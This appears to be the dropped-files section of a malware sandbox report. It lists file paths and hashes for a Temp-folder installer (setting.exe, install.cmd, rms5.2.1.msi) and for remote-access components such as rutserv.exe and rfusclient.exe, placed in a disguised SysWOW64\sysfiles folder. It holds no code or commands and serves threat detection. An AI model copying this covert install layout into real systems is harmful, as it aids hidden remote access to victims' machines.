SHA1 ea865544d22a480a8451cabdbd89f187c7932798
SHA256 f24120d552d2ac35919e34e4896b1c6ca294106ef4ffcd5a68dc959f39b1f1c3
SHA512 d666fa88fdfcefa1456774bd4d3600f7f76c45bcec1820a095ee4be931ff8b043973503c5b6d7d8c93a3cd337ff6d12cbb272f2523e0178dca1d2d60e11e8c36

C:\Users\Admin\AppData\Local\Temp\setting.exe

MD5 5913f76c2f3b690c5f258c99361a56a7
SHA1 ea865544d22a480a8451cabdbd89f187c7932798
SHA256 f24120d552d2ac35919e34e4896b1c6ca294106ef4ffcd5a68dc959f39b1f1c3
SHA512 d666fa88fdfcefa1456774bd4d3600f7f76c45bcec1820a095ee4be931ff8b043973503c5b6d7d8c93a3cd337ff6d12cbb272f2523e0178dca1d2d60e11e8c36

C:\Users\Admin\AppData\Local\Temp\install.cmd

MD5 72b87d46624306c3e39acee8794c4dff
SHA1 6d5717c0b19f6b01419131eac2a713c5381e8156
SHA256 df42bf4d7de1d91d8d46bf5cac60395025650aa5107beb4a7d73f274c098aecb
SHA512 544ca3365d31fce1d50d7f380c0e67219c9b4146da258b76a91fa655aa4471bb3bfad7e0b257fff7e18abc7b1a4dfdcbc767915984c080a823a327c17a686fc7

memory/700-87-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\rms5.2.1.msi

MD5 2abaf6748b3b3a8aad84f715ae3bd3c1
SHA1 c03d62077019f114c317e6e78b5c3b0e8893cd0e
SHA256 c6e22f166038f6f2d131ade1861ace4fd83f0ce9dc46f5b5f0332ef918ef0164
SHA512 b4f563c9e5d2aac42fb088851c1e00de4cbf8c9506e2d09f86eaedb9cd103ad19a0ed50e3e4c1dee892eb25a37f5b2221c8c609ddd83d2fb3f51c5891cfdeec2

\Windows\Installer\MSI2DA5.tmp

MD5 b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256 b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

C:\Windows\Installer\MSI2DA5.tmp

MD5 b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256 b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

C:\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

memory/1412-135-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1984-138-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Windows\SysWOW64\sysfiles\RWLN.dll

MD5 bb1f3e716d12734d1d2d9219a3979a62
SHA1 0ef66eed2f2ae45ec2d478902833b830334109cb
SHA256 d7e9c9043ed7df2af800d9b2a33e3efddf68b70f043e9717afc4b7dd4e13e077
SHA512 bbc90747dd45a01b05f5c0b6fa58ffe18af894b05363267ac1cc9fe3262f5e65c8ae4e08dfd82d89b9112e86e42d24a12784b79f5ea30b6443015c19b6792c9c

memory/1992-149-0x0000000000260000-0x0000000000261000-memory.dmp

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/1840-152-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

memory/832-161-0x0000000000240000-0x0000000000241000-memory.dmp

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll

MD5 8e3f59b8c9dfc933fca30edefeb76186
SHA1 37a78089d5936d1bc3b60915971604c611a94dbd
SHA256 528c0656751b336c10cb4c49b703eae9c3863f7f416d0e09b198b082cc54aeb8
SHA512 3224c20c30556774fd4bed78909f451b9a5a46aa59271b5e88b1e0e60145d217802a8f1fda3d3fabcd8546ca7783e0c70f0c419a28efe6c5160a102553a3c91d

C:\Windows\SysWOW64\sysfiles\vp8encoder.dll

MD5 c638bca1a67911af7f9ed67e7b501154
SHA1 0fd74d2f1bd78f678b897a776d8bce36742c39b7
SHA256 519078219f7f6db542f747702422f902a21bfc3aef8c6e6c3580e1c5e88162b8
SHA512 ca8133399f61a1f339a14e3fad3bfafc6fe3657801fd66df761c88c18b2dc23ceb02ba6faa536690986972933bec2808254ef143c2c22f881285facb4364659f

C:\Windows\SysWOW64\sysfiles\vp8decoder.dll

MD5 6f6bfe02e84a595a56b456f72debd4ee
SHA1 90bad3ae1746c7a45df2dbf44cd536eb1bf3c8e2
SHA256 5e59b566eda7bb36f3f5d6dd39858bc9d6cf2c8d81deca4ea3c409804247da51
SHA512 ed2a7402699a6d00d1eac52b0f2dea4475173be3320dfbad5ca58877f06638769533229bc12bce6650726d3166c0e5ebac2dad7171b77b29186d4d5e65818c50

C:\Windows\SysWOW64\sysfiles\ripcserver.dll

MD5 30e269f850baf6ca25187815912e21c5
SHA1 eb160de97d12b4e96f350dd0d0126d41d658afb3
SHA256 379191bfd34d41e96760c7a539e2056a22be3d44bf0e8712b53e443f55aead90
SHA512 9b86a4eefdcae46e605f85e752ef61e39fd0212a19b7fd4c35eb3ab99851a0b906d048d12d1e1e985a340a67a64d405b8cf803555865137278f0c19d686df5e7

C:\Windows\SysWOW64\sysfiles\rasadhlp.dll

MD5 8679b09cc9600a1f11a3c09cec12637b
SHA1 cad5c92e561b64d1f4e1f70c7596dcf186304ecb
SHA256 7e840982833d4c4d68835003960762fa3982c899ac1c8b63e4fdbbb35448152f
SHA512 93a8d0e78932793ccd534c17c48af203665d7b3d326d7b21b2b4aa54925a853e674324774fa9a99194eca7a930d504568095529a6b6a2e63b73f0c719bc424e6

C:\Windows\SysWOW64\sysfiles\msvcr90.dll

MD5 7538050656fe5d63cb4b80349dd1cfe3
SHA1 f825c40fee87cc9952a61c8c34e9f6eee8da742d
SHA256 e16bc9b66642151de612ee045c2810ca6146975015bd9679a354567f56da2099
SHA512 843e22630254d222dfd12166c701f6cd1dca4a8dc216c7a8c9c0ab1afc90189cfa8b6499bbc46408008a1d985394eb8a660b1fa1991059a65c09e8d6481a3af8

C:\Windows\SysWOW64\sysfiles\msvcp90.dll

MD5 b2eee3dee31f50e082e9c720a6d7757d
SHA1 3322840fef43c92fb55dc31e682d19970daf159d
SHA256 4608beedd8cf9c3fc5ab03716b4ab6f01c7b7d65a7c072af04f514ffb0e02d01
SHA512 8b1854e80045001e7ab3a978fb4aa1de19a3c9fc206013d7bc43aec919f45e46bb7555f667d9f7d7833ab8baa55c9098af8872006ff277fc364a5e6f99ee25d3

C:\Windows\SysWOW64\sysfiles\gdiplus.dll

MD5 871c903a90c45ca08a9d42803916c3f7
SHA1 d962a12bc15bfb4c505bb63f603ca211588958db
SHA256 f1da32183b3da19f75fa4ef0974a64895266b16d119bbb1da9fe63867dba0645
SHA512 985b0b8b5e3d96acfd0514676d9f0c5d2d8f11e31f01acfa0f7da9af3568e12343ca77f541f55edda6a0e5c14fe733bda5dc1c10bb170d40d15b7a60ad000145

C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll

MD5 ff622a8812d8b1eff8f8d1a32087f9d2
SHA1 910615c9374b8734794ac885707ff5370db42ef1
SHA256 1b8fe11c0bdcbf1f4503c478843de02177c606912c89e655e482adec787c2ebf
SHA512 1a7c49f172691bf071df0d47d6ee270afbfa889afb8d5bd893496277fd816630ecd7b50c978b53d88228922ba6070f382b959ffc389394e0f08daab107369931

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

memory/1756-178-0x0000000000230000-0x0000000000231000-memory.dmp

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\rasadhlp.dll

MD5 8679b09cc9600a1f11a3c09cec12637b
SHA1 cad5c92e561b64d1f4e1f70c7596dcf186304ecb
SHA256 7e840982833d4c4d68835003960762fa3982c899ac1c8b63e4fdbbb35448152f
SHA512 93a8d0e78932793ccd534c17c48af203665d7b3d326d7b21b2b4aa54925a853e674324774fa9a99194eca7a930d504568095529a6b6a2e63b73f0c719bc424e6